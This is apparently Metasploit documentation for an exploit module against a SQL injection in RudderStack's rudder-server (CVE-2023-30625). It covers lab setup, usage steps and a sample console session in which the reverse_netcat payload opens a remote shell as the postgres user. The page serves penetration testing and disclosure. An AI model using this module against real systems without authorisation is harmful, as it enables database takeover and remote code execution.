## Vulnerable Application

RudderStack is an open-source Customer Data Platform (CDP) that helps organizations collect,
unify, and route customer data to various destinations.
A Customer Data Platform is a software system that centralizes and manages customer data from multiple sources,
providing a unified view of customer interactions and behaviors.
RudderStack is an independent, stand-alone system with a dependency only on the database (PostgreSQL).
Its backend is written in Go with a rich UI written in React.js.

This Metasploit exploit module targets a SQL injection vulnerability (CVE-2023-30625) in RudderStack's `rudder-server`,
an open-source Customer Data Platform (CDP). The vulnerability affects versions of `rudder-server` before 1.3.0-rc.1.
By exploiting this flaw, an attacker can execute arbitrary SQL commands,
potentially leading to Remote Code Execution (RCE) since the `rudder` role in PostgreSQL has superuser permissions by default.
This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).
Check [here](https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/) for full disclosure writeup.

**Note: The backend code of rudder-server is written with Golang and can also be compiled for Windows.
Due to the insufficient build instructions for Windows platforms, the Windows target is disabled in this exploit module.**

## Testing
For installing the vulnerable version follow the steps below,
1. Download [docker-compose.yml](https://raw.githubusercontent.com/rudderlabs/rudder-server/master/rudder-docker.yml) file.
2. Replace `<your_workspace_token>` in this file with your workspace workspace-token
Check [here](https://www.rudderstack.com/docs/get-started/rudderstack-open-source/data-plane-setup/docker/#workspace-token)
for obtaining workspace-token.
3. Edit `rudder-server:latest` version as `rudder-server:1.2.5` inside the docker-compose.yml file.
4. Run `docker compose -f rudder-docker.yml up -d`

After these steps the rudder-server API will be exposed on the `http://localhost:8080/` address.

## Verification Steps

1. msfconsole
2. Do: `use exploit/multi/http/rudder_server_sqli_rce`
3. Do: `set RHOST [IP]`
4. Do: `set RPORT [PORT]`
5. Do: `check`
6. You should get a shell.

## Options

## Scenarios

```
msf6 > use exploit/multi/http/rudder_server_sqli_rce 
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(multi/http/rudder_server_sqli_rce) > set rhosts 192.168.1.20
rhosts => 192.168.1.20
msf6 exploit(multi/http/rudder_server_sqli_rce) > set lhost 192.168.1.10
lhost => 192.168.1.10
msf6 exploit(multi/http/rudder_server_sqli_rce) > set lport 4444
lport => 4444
msf6 exploit(multi/http/rudder_server_sqli_rce) > run

[*] Started reverse TCP handler on 192.168.1.10:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation.
[*] Detected rudder version: Unknown
[*] Triggering RCE via crafted SQL query...
id
uid=70(postgres) gid=70(postgres) groups=70(postgres),70(postgres)

```
